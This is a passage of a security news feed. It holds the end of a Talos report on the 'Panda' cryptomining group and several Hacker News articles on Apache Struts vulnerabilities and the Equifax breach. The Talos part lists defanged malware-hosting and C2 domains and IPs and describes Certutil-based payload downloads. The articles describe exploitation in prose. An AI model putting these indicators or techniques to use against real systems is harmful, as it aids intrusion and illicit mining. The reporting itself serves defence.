relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules, which include Shadow Brokers' exploits and Mimikatz. \n \nOne difference is that several samples contained a Gh0st RAT default mutex \"DOWNLOAD_SHELL_MUTEX_NAME\" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. 
The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and the older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior. \n \nOn August 19, 2019, we observed that Panda had added another set of domains to their inventory of C2 and payload-hosting infrastructure. In line with their previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as \"BBBBB\", instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18. \n \nIn line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to \"oo[.]mygoodluck[.]best:51888:WervPoxySvc\", and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club. \n \nCisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools, which include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best. 
\n\n\n[](<https://1.bp.blogspot.com/-2-PgtrQPKAE/XYDgeQ-XHeI/AAAAAAAAB8Q/2AJE3Rk0IHURq9oeqIjqMw-Ft37AHxp_ACLcBGAsYHQ/s1600/image1.png>)\n\n[](<https://1.bp.blogspot.com/-uPJKV52J9K0/XYDgjBhDZaI/AAAAAAAAB8U/sfPHOODu5c8pmRVRrcPdlaQ6G-VnpW9VQCLcBGAsYHQ/s1600/image3.png>)\n\n## Conclusion\n\nPanda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated. \n \nHowever, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from the HFS instances used by Panda shows that this malware had a wide reach, and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits depends on when they sold. \n \nPanda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and are quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat, and Talos will continue to monitor their activity in order to thwart their operations. 
\n\n\n## COVERAGE\n\nFor coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://talosintelligence.com/resources/65>) \n \n\n\n[](<https://1.bp.blogspot.com/-VoLoSQumND8/XYDgUqa4CvI/AAAAAAAAB8I/dQAoulvM4nofqrokMtgPSQZJYLLOLLmZwCLcBGAsYHQ/s1600/image2.png>)\n\nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or [Web Security Appliance (WSA)](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nNetwork Security appliances such as [Next-Generation Firewall (NGFW)](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>), [Next-Generation Intrusion Prevention System (NGIPS)](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>), and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). 
\n\n\n## IOCs\n\n### Domains\n\n### IPs\n\n### SHA-256\n\n### Monero Wallets\n \n", "cvss3": {}, "published": "2019-09-17T08:09:45", "type": "talosblog", "title": "Cryptocurrency miners aren\u2019t dead yet: Documenting the voracious but simple \u201cPanda\u201d", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T08:09:45", "id": "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3w3NM3N6VuY/panda-evolution.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:55", "description": "[](<https://3.bp.blogspot.com/-F7ViQ9JXvL8/Wbo_3TiAKWI/AAAAAAAAAJM/fsHVxS_O8ysIy4sZ2wdnG1OfLkiNJTjzgCLcBGAs/s1600/equifax-apache-struts.png>)\n\nThe [massive Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) that exposed highly sensitive data of as many as 143 million people was caused by [exploiting a flaw in Apache Struts](<https://thehackernews.com/2017/03/apache-struts-framework.html>) framework, which Apache 
had patched more than two months before the security incident, Equifax has confirmed. \n \nCredit rating agency Equifax is yet another example of a company that fell victim to a massive cyber attack because it did not patch a critical vulnerability on time, even though a fix had already been issued by the respective vendor. \n \nRated critical with a maximum 10.0 score, the Apache Struts2 vulnerability (CVE-2017-5638) exploited in the Equifax breach was disclosed and fixed by Apache on March 6 with the release of Apache Struts version 2.3.32 or 2.5.10.1. \n \nThis flaw is separate from CVE-2017-9805, [another Apache Struts2 vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) that was patched earlier this month: a programming bug in the way the Struts REST plugin handles XML payloads while deserializing them, fixed in Struts version 2.5.13. \n \nRight after the disclosure of the vulnerability, hackers started actively exploiting the flaw in the wild to install rogue applications on affected web servers after its [proof-of-concept (PoC) exploit code](<https://thehackernews.com/2017/03/apache-struts-framework.html>) was uploaded to a Chinese site. \n \nDespite patches being available and evidence that the flaw was already under mass attack by hackers, Equifax failed to patch its Web applications against the flaw, which resulted in the breach of personal data of [nearly half of the US population](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>). 
\n\n\n> \"Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cyber security firm to determine what information was accessed and who have been impacted,\" the company officials wrote in an [update on the website](<https://www.equifaxsecurity2017.com/>) with a new \"A Progress Update for Consumers.\" \n\n> \"We [know that](<https://www.equifaxsecurity2017.com/2017/09/13/progress-update-consumers-4/>) criminals exploited a US website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\"\n\nCVE-2017-5638 was a then-zero-day vulnerability discovered in the [popular Apache Struts](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) web application framework by Cisco's Threat intelligence firm Talos, which observed a number of active attacks exploiting the flaw. \n \nThe issue was a remote code execution bug in the Jakarta Multipart parser of Apache Struts2 that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n \nAt the time, Apache warned it was possible to perform a remote code execution attack with \"a malicious Content-Type value,\" and if this value is not valid \"an exception is thrown which is then used to display an error message to a user.\" \n \n**Also Read: **[Steps You Should Follow to Protect Yourself From Equifax Breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) \n \nFor those unaware, Apache Struts is a free, open-source MVC framework for developing web applications in the Java programming language that run both front-end and back-end Web servers. The framework is used by 65n per cent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. 
\n \nSince the hackers are actively exploiting the vulnerabilities in the Apache Struts web framework, Cisco has also [initiated an investigation](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) into its products against four newly discovered security vulnerabilities in Apache Struts2. \n \nOther companies that also incorporate a version of Apache Struts 2 should also check their infrastructures against these vulnerabilities. \n \nEquifax is currently offering free credit-monitoring and identity theft protection services for people who are affected by the massive data leak and has also enabled a security freeze for access to people's information. \n \nWhile the company was initially criticised for generating a PIN that was simply a time and date stamp and easy-to-guess, the PIN generation method was later changed to randomly generate numbers.\n", "cvss3": {}, "published": "2017-09-13T21:38:00", "type": "thn", "title": "Equifax Suffered Data Breach After It Failed to Patch Old Apache Struts Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T10:00:54", "id": "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "href": "https://thehackernews.com/2017/09/equifax-apache-struts.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:40:18", "description": "[](<https://thehackernews.com/images/-ktDJMSI6Gdo/W310Im7Od5I/AAAAAAAAx8k/iNNQd5VURi8zRV8-MZosbkEo-V4eXjqowCLcBGAs/s728-e100/apache-struts-vulnerability-hacking.png>)\n\nSemmle security researcher Man Yue Mo has [disclosed](<https://lgtm.com/blog/apache_struts_CVE-2018-11776>) a critical remote code execution vulnerability in the popular Apache Struts web application framework that could allow remote attackers to run malicious code on the affected servers. 
**New Apache Struts RCE Flaw Lets Hackers Take Over Web Servers** (The Hacker News, published 2018-08-22): <https://thehackernews.com/2018/08/apache-struts-vulnerability.html>

Apache Struts is an open source framework for developing web applications in the Java programming language and is widely used by enterprises globally, including by 65 percent of the Fortune 100 companies, like Vodafone, Lockheed Martin, Virgin Atlantic, and the IRS.

The vulnerability (**CVE-2018-11776**) resides in the core of the Struts framework and stems from insufficient validation of untrusted, user-provided input under certain configurations.

The newly found Apache Struts exploit can be triggered just by visiting a specially crafted URL on the affected web server, allowing attackers to execute malicious code and eventually take complete control over the targeted server running the vulnerable application.

## Struts2 Vulnerability - Are You Affected?

All applications that use Apache Struts, supported versions (Struts 2.3 to Struts 2.3.34, and Struts 2.5 to Struts 2.5.16) and even some unsupported Apache Struts versions, are potentially vulnerable to this flaw, even when no additional plugins have been enabled.

> "This vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers," Yue Mo said.

Your Apache Struts implementation is vulnerable to the reported RCE flaw if it meets the following conditions:

 * The **alwaysSelectFullNamespace** flag is set to true in the Struts configuration.
 * The Struts configuration file contains an "action" or "url" tag that either does not specify the optional namespace attribute or specifies a wildcard namespace.

According to the researcher, even if an application is currently not vulnerable, "an inadvertent change to a Struts configuration file may render the application vulnerable in the future."

## Here's Why You Should Take Apache Struts Exploit Seriously

Less than a year ago, credit rating agency Equifax exposed [personal details of its 147 million consumers](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) because it failed to patch a similar [Apache Struts flaw](<https://thehackernews.com/2017/03/apache-struts-framework.html>) that was disclosed earlier that year (CVE-2017-5638).

The Equifax breach cost the company over $600 million in losses.

> "Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit," said Pavel Avgustinov, Co-founder & VP of QL Engineering at Semmle.

> "A hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system."

## Patch Released for Critical Apache Struts Bug

Apache Struts has fixed the vulnerability with the release of Struts versions 2.3.35 and 2.5.17. Organizations and developers who use Apache Struts are urgently advised to upgrade their Struts components as soon as possible.

We have seen how previous disclosures of similar critical flaws in Apache Struts have resulted in [PoC exploits](<https://thehackernews.com/2017/03/apache-struts-framework.html>) being published within a day, and exploitation of the [vulnerability in the wild](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>), putting critical infrastructure as well as customers' data at risk.

Therefore, users and administrators are strongly advised to upgrade their Apache Struts components to the latest versions, even if they believe their configuration is not vulnerable right now.

This is not the first time the Semmle Security Research Team has reported a critical RCE flaw in Apache Struts. Less than a year ago, the team disclosed a similar [remote code execution vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) (CVE-2017-9805) in Apache Struts.

## UPDATE: Apache Struts RCE Exploit PoC Released

A security researcher has today released [a PoC exploit](<https://github.com/jas502n/St2-057/blob/master/README.md>) for the newly discovered remote code execution (RCE) vulnerability (CVE-2018-11776) in the Apache Struts web application framework.

**UK Regulator Fines Equifax £500,000 Over 2017 Data Breach** (The Hacker News, published 2018-09-20): <https://thehackernews.com/2018/09/equifax-credit-reporting-breach.html>
Atlanta-based consumer credit reporting agency Equifax has been issued a £500,000 fine by the UK's privacy watchdog for last year's [massive data breach](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) that exposed personal and financial data of hundreds of millions of its customers.

Yes, £500,000: that is the maximum fine allowed by the UK's Data Protection Act 1998, though the penalty is apparently a small figure for a $16 billion company.

In July this year, the UK's data protection watchdog issued the maximum allowed fine of [£500,000 on Facebook](<https://thehackernews.com/2018/07/facebook-cambridge-analytica.html>) over the [Cambridge Analytica scandal](<https://thehackernews.com/2018/03/facebook-cambridge-analytica.html>), saying the social media giant failed to prevent UK citizens' data from falling into the wrong hands.

## Flashback: The Equifax Data Breach 2017

Equifax suffered a massive data breach last year between mid-May and the end of July, exposing highly [sensitive data of as many as 145 million people](<https://thehackernews.com/2017/10/equifax-credit-security-breach.html>) globally.

The stolen information included victims' names, dates of birth, phone numbers, driver's license details, addresses, and social security numbers, along with credit card information and personally identifying information (PII) for hundreds of thousands of its consumers.

The data breach occurred because the company failed to patch a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) on time, even though a patch had already been released by Apache.

## Why Has the U.K. Fined a US Company?

The UK's Information Commissioner's Office (ICO), which launched a joint investigation into the breach with the Financial Conduct Authority, has now [issued](<https://ico.org.uk/about-the-ico/news-and-events/news-and-blogs/2018/09/credit-reference-agency-equifax-fined-for-security-breach/>) its largest possible monetary penalty under the country's Data Protection Act for the massive data breach: £500,000, equal to around $665,000.

The ICO said that although the [cyber attack compromised Equifax](<https://thehackernews.com/2017/09/equifax-data-breach.html>) systems in the United States, the company "failed to take appropriate steps" to protect the personal information of its 15 million UK customers.

The ICO investigation revealed "multiple failures" at the company, such as keeping users' personal information longer than necessary, which resulted in the following exposures:

 * 19,993 UK customers had their names, dates of birth, telephone numbers and driving license numbers exposed.
 * 637,430 UK customers had their names, dates of birth and telephone numbers exposed.
 * Up to 15 million UK customers had names and dates of birth exposed.
 * Some 27,000 UK residents also had their Equifax account email addresses stolen.
 * 15,000 UK customers also had their names, dates of birth, addresses, account usernames and plaintext passwords, account recovery secret questions and answers, obscured credit card numbers, and spending amounts stolen by hackers.

## Breach Was Result of Multiple Failures at Equifax

The ICO said that Equifax had also been warned about a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/03/apache-struts-framework.html>) in its systems by the United States Department of Homeland Security (DHS) in March 2017, but the company did not take appropriate steps to fix the issue.

Initially, it was also reported that the company kept news of the [breach hidden for a month](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) after its internal discovery, giving three senior executives at Equifax time to sell almost $2 million worth of its shares, though the company denied such claims.

Since the data breach happened before the EU's General Data Protection Regulation (GDPR) took effect in May 2018, the fine was capped at the £500,000 maximum of the UK's old Data Protection Act 1998.

The penalty could have been much larger had it fallen under GDPR, wherein a company could face a [maximum fine of 20 million euros](<https://thehackernews.com/2017/08/data-breach-security-law.html>) or 4 percent of its annual global revenue, whichever is higher, for such a privacy breach.

In response to the ICO's penalty, Equifax said that it has fully cooperated with the ICO throughout the investigation but that it is "disappointed in the findings and the penalty."

Equifax received the Monetary Penalty Notice from the ICO on Wednesday and can appeal the penalty.

**New Apache Struts Zero-Day Vulnerability Being Exploited in the Wild** (The Hacker News, published 2017-03-09): <https://thehackernews.com/2017/03/apache-struts-framework.html>

Security researchers have discovered a zero-day vulnerability in the popular Apache Struts web application framework, which is being actively exploited in the wild.

Apache Struts is a free, open-source, Model-View-Controller (MVC) framework for creating elegant, modern Java web applications, which supports REST, AJAX, and JSON.

In a [blog post](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) published Monday, Cisco's threat intelligence team Talos announced that it had observed a number of active attacks against the zero-day vulnerability (CVE-2017-5638) in Apache Struts.

According to the researchers, the issue is a remote code execution vulnerability in the Jakarta Multipart parser of Apache Struts that could allow an attacker to execute malicious commands on the server during file uploads handled by that parser.

> "It is possible to perform an RCE attack with a malicious Content-Type value," [warned](<https://cwiki.apache.org/confluence/display/WW/S2-045>) Apache. "If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user."

The vulnerability, documented at Rapid7's Metasploit Framework [GitHub site](<https://github.com/rapid7/metasploit-framework/issues/8064>), has been patched by Apache.
So, if you are using the Jakarta-based file upload Multipart parser under Apache Struts 2, you are advised to upgrade to Apache Struts version 2.3.32 or 2.5.10.1 immediately.

### Exploit Code Publicly Released

The vulnerability is especially dangerous because the Talos researchers detected public proof-of-concept (PoC) exploit code, which was uploaded to a Chinese site.

The researchers even detected "a high number of exploitation events," the majority of which seem to be leveraging the publicly released PoC, which is being used to run various malicious commands.

In some cases, the attackers executed simple "whoami" commands to see if the target system is vulnerable, while in others, the malicious attacks turned off firewall processes on the target and dropped payloads.

> "Final steps include downloading a malicious payload from a web server and execution of said payload," the researchers say. "The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the Bill Gates botnet... A payload is downloaded and executed from a privileged account."

Attackers also attempted to gain persistence on infected hosts by adding a binary to the boot-up routine.

According to the researchers, the attackers tried to copy the file to a benign directory and ensure "that both the executable runs and that the firewall service will be disabled when the system boots."

Both Cisco and Apache researchers urge administrators to upgrade their systems to Apache Struts version 2.3.32 or 2.5.10.1 as soon as possible. Admins can also switch to a different [implementation](<https://cwiki.apache.org/confluence/display/WW/File+Upload#FileUpload-AlternateLibraries>) of the Multipart parser.

**Critical Flaw in Apache Struts2 Lets Hackers Take Over Web Servers** (The Hacker News, published 2017-09-05): <https://thehackernews.com/2017/09/apache-struts-vulnerability.html>

Security researchers have [discovered](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) a critical remote code execution vulnerability in the popular Apache Struts web application framework, allowing a remote attacker to run malicious code on the affected servers.

Apache Struts is a free, open-source, Model-View-Controller (MVC) framework for developing web applications in the Java programming language, which supports REST, AJAX, and JSON.

The vulnerability (CVE-2017-9805) is a programming blunder that resides in the way Struts processes data from an untrusted source. Specifically, the Struts REST plugin fails to handle XML payloads properly while deserializing them.

All versions of Apache Struts since 2008 (Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12) are affected, leaving all web applications using the framework's REST plugin vulnerable to remote attackers.
According to one of the security researchers at LGTM, who [discovered](<https://lgtm.com/blog/apache_struts_CVE-2017-9805>) this flaw, the Struts framework is being used by "an incredibly large number and variety of organisations," including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS.

"On top of that, [the vulnerability] is incredibly easy for an attacker to exploit this weakness: all you need is a web browser," Man Yue Mo, an LGTM security researcher, said.

All an attacker needs to do is submit malicious XML in a particular format to trigger the vulnerability on the targeted server.

Successful exploitation of the vulnerability could allow an attacker to take full control of the affected server, eventually letting the attacker infiltrate other systems on the same network.

Mo said this flaw is an unsafe deserialization in Java similar to a vulnerability in Apache Commons Collections, [discovered](<https://frohoff.github.io/appseccali-marshalling-pickles/>) by Chris Frohoff and Gabriel Lawrence in 2015, that also allowed arbitrary code execution.

Many Java applications have since been affected by multiple similar vulnerabilities in recent years.

Since this vulnerability has been patched in [Struts version 2.5.13](<https://struts.apache.org/docs/s2-052.html>), administrators are strongly advised to upgrade their Apache Struts installation as soon as possible.

The researchers have not yet published further technical details or a proof-of-concept, giving admins time to upgrade their systems.

**Apache Struts 2 Flaws Affect Multiple Cisco Products** (The Hacker News, published 2017-09-11): <https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>

After the [massive Equifax data breach](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>), believed to have been caused by [a vulnerability in Apache Struts](<https://thehackernews.com/2017/03/apache-struts-framework.html>), Cisco has initiated an investigation into its products that incorporate a version of the popular Apache Struts2 web application framework.

Apache Struts is a free, open-source MVC framework for developing web applications in the Java programming language, and is used by 65 percent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS.

However, the popular open-source software package was recently found affected by multiple vulnerabilities, including two remote code execution vulnerabilities (one discovered earlier this month, and another in March), one of which is [believed to have been used](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) to breach personal data of over [143 million Equifax users](<https://thehackernews.com/2017/09/equifax-data-breach.html>).
Some Cisco products, including its Digital Media Manager, MXE 3500 Series Media Experience Engines, Network Performance Analysis, Hosted Collaboration Solution for Contact Center, and Unified Contact Center Enterprise, have been found vulnerable to multiple Apache Struts flaws.

### Cisco Launches Apache Struts Vulnerability Hunting

Cisco is also testing the rest of its products against four newly discovered security vulnerabilities in Apache Struts2, including the one (CVE-2017-9805) [we reported on September 5](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) and three others also disclosed last week.

However, the remote code execution bug (CVE-2017-5638) that was [actively exploited back in March](<https://thehackernews.com/2017/03/apache-struts-framework.html>) this year is not included by the company in its recent security audit.

The three vulnerabilities (CVE-2017-9793, CVE-2017-9804 and CVE-2017-9805) included in the [Cisco security audit](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170907-struts2>) were disclosed by the Apache Software Foundation on 5th September with the release of Apache Struts 2.5.13, which patched the issues.

The fourth vulnerability (CVE-2017-12611), which is being [investigated by Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170909-struts2-rce>), was disclosed on 7th September with the release of Apache Struts 2.3.34, which fixed it. The flaw resided in the Freemarker tag functionality of the Apache Struts2 package and could allow an unauthenticated, remote attacker to execute malicious code on an affected system.

### Apache Struts Flaw Actively Exploited to Hack Servers & Deliver Malware

The most severe of all, CVE-2017-9805 (rated critical), is a programming bug in the way the Struts REST plugin handles XML payloads while deserializing them.

This could allow a remote, unauthenticated attacker to achieve remote code execution on a host running a vulnerable version of Apache Struts2, and Cisco's threat intelligence team Talos has [observed](<http://blog.talosintelligence.com/2017/09/apache-struts-being-exploited.html>) that this flaw is [under active exploitation](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) to find vulnerable servers.

Security researchers from data centre security vendor Imperva recently [detected](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) and blocked thousands of attacks attempting to exploit this Apache Struts2 vulnerability (CVE-2017-9805), roughly 80 percent of which tried to deliver a malicious payload.

The majority of attacks originated from China, with a single Chinese IP address registered to a Chinese e-commerce company sending out more than 40% of all the requests. Attacks also came from Australia, the U.S., Brazil, Canada, Russia and various parts of Europe.

Of the two remaining flaws, one (CVE-2017-9793) is again a vulnerability in the REST plug-in for Apache Struts that manifests due to "insufficient validation of user-supplied input by the XStream library in the REST plug-in for the affected application."

This flaw has been given a Medium severity and could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on targeted systems.

The last flaw (CVE-2017-9804) also allows an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected system, but resides in the URLValidator feature of Apache Struts.

Cisco is testing its products against these vulnerabilities, including its WebEx Meetings Server, the Data Center Network Manager, Identity Services Engine (ISE), MXE 3500 Series Media Experience Engines, several Cisco Prime products, some products for voice and unified communications, as well as video and streaming services.

At present, there are no software patches to address the vulnerabilities in Cisco products, but the company promised to release updates for affected software, which will soon be accessible through the [Cisco Bug Search Tool](<https://bst.cloudapps.cisco.com/bugsearch/bug/BUGID>).

Since the framework is widely used by a majority of Fortune 100 companies, they too should check any parts of their infrastructure that incorporate a version of Apache Struts2 against these vulnerabilities.

**Whoops, Turns Out 2.5 Million More Americans Were Affected By Equifax Breach** (The Hacker News, published 2017-10-02): <https://thehackernews.com/2017/10/equifax-credit-security-breach.html>

The [Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) was bigger than initially reported, exposing highly sensitive information of more Americans than previously revealed.

Credit rating agency Equifax says an additional 2.5 million U.S. consumers were also impacted by the massive data breach the company disclosed last month, bringing the total possible victims to 145.5 million from 143 million.
Equifax last month announced that it had suffered a massive data breach that exposed highly sensitive data of hundreds of millions of its customers, which includes names, social security numbers, dates of birth and addresses.

In addition, credit card information for [nearly 209,000 customers](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) was also stolen, as well as certain documents with personally identifying information (PII) for approximately 182,000 Equifax consumers.

The breach was due to a critical vulnerability ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) in the Apache Struts 2 framework, which Apache had patched (on March 6) more than two months before the security incident.

Equifax was even [informed by the US-CERT](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) on March 8 to patch the flaw, but the company failed to identify or patch its vulnerable systems, Equifax ex-CEO Richard Smith said in a statement [[PDF](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>)] to the House Committee on Energy and Commerce.

> "It appears that the breach occurred because of both human error and technology failures," Smith said. "Equifax's information security department also ran scans that should have identified any systems that were vulnerable to the Apache Struts issue...Unfortunately, however, the scans did not identify the Apache Struts vulnerability."

In the wake of the security incident, the company hired FireEye-owned security firm Mandiant to investigate the breach, which has now concluded the forensic portion of its investigation and plans to release the results "promptly."

Mandiant said a total of 145.5 million consumers might now potentially have been [impacted by the breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>), which is 2.5 million more than previously estimated. However, the firm did not identify any evidence of "new attacker activity."

> "Mandiant did not identify any evidence of additional or new attacker activity or any access to new databases or tables," Equifax said in a Monday [press release](<https://investor.equifax.com/news-and-events/news/2017/10-02-2017-213238821>).

> "Instead, this additional population of consumers was confirmed during Mandiant's completion of the remaining investigative tasks and quality assurance procedures built into the investigative process."

The forensic investigation also found that approximately 8,000 Canadian consumers were also impacted, far below the 100,000 initially estimated by the credit rating and reporting firm.

However, Equifax said that this figure "was preliminary and did not materialize."

"I want to apologize again to all impacted consumers. As this important phase of our work is now completed, we continue to take numerous steps to review and enhance our cybersecurity practices," newly appointed interim CEO Paulino do Rego Barros, Jr. said.
"We also continue to work closely with our internal team and outside advisors to implement and accelerate long-term security improvements."

Equifax, which maintains data on over 820 million consumers and over 91 million businesses worldwide, also said it would update its own notification by October 8 so that customers can check whether they were among those affected by the data breach.

**Top 15 Vulnerabilities Attackers Exploited Millions of Times to Hack Linux Systems** (The Hacker News, published 2021-08-23): <https://thehackernews.com/2021/08/top-15-vulnerabilities-attackers.html>

Close to 14 million Linux-based systems are directly exposed to the Internet, making them a lucrative target for an array of real-world attacks that could result in the deployment of malicious web shells, coin miners, ransomware, and other trojans.

That's according to an in-depth look at the Linux threat landscape published by U.S.-Japanese cybersecurity firm [Trend Micro](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/linux-threat-report-2021-1h-linux-threats-in-the-cloud-and-security-recommendations>), detailing the top threats and vulnerabilities affecting the operating system in the first half of 2021, based on data amassed from honeypots, sensors, and anonymized telemetry.

The company, which detected nearly 15 million malware events aimed at Linux-based cloud environments, found coin miners and ransomware to make up 54% of all malware, with web shells accounting for a 29% share.

In addition, by dissecting over 50 million events reported from 100,000 unique Linux hosts during the same time period, the researchers found 15 different security weaknesses that are known to be actively exploited in the wild or have a proof of concept (PoC):

 * [**CVE-2017-5638**](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>) (CVSS score: 10.0) - Apache Struts 2 remote code execution (RCE) vulnerability
 * [**CVE-2017-9805**](<https://nvd.nist.gov/vuln/detail/CVE-2017-9805>) (CVSS score: 8.1) - Apache Struts 2 REST plugin XStream RCE vulnerability
 * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal Core RCE vulnerability
 * [**CVE-2020-14750**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14750>) (CVSS score: 9.8) - Oracle WebLogic Server RCE vulnerability
 * [**CVE-2020-25213**](<https://nvd.nist.gov/vuln/detail/CVE-2020-25213>) (CVSS score: 10.0) - WordPress File Manager (wp-file-manager) plugin RCE vulnerability
 * [**CVE-2020-17496**](<https://nvd.nist.gov/vuln/detail/CVE-2020-17496>) (CVSS score: 9.8) - vBulletin 'subwidgetConfig' unauthenticated RCE vulnerability
 * [**CVE-2020-11651**](<https://nvd.nist.gov/vuln/detail/CVE-2020-11651>) (CVSS score: 9.8) - SaltStack Salt authorization weakness vulnerability
 * [**CVE-2017-12611**](<https://nvd.nist.gov/vuln/detail/CVE-2017-12611>) (CVSS score: 9.8) - Apache Struts OGNL expression RCE vulnerability
 * [**CVE-2017-7657**](<https://nvd.nist.gov/vuln/detail/CVE-2017-7657>) (CVSS score: 9.8) - Eclipse Jetty chunk length parsing integer overflow vulnerability
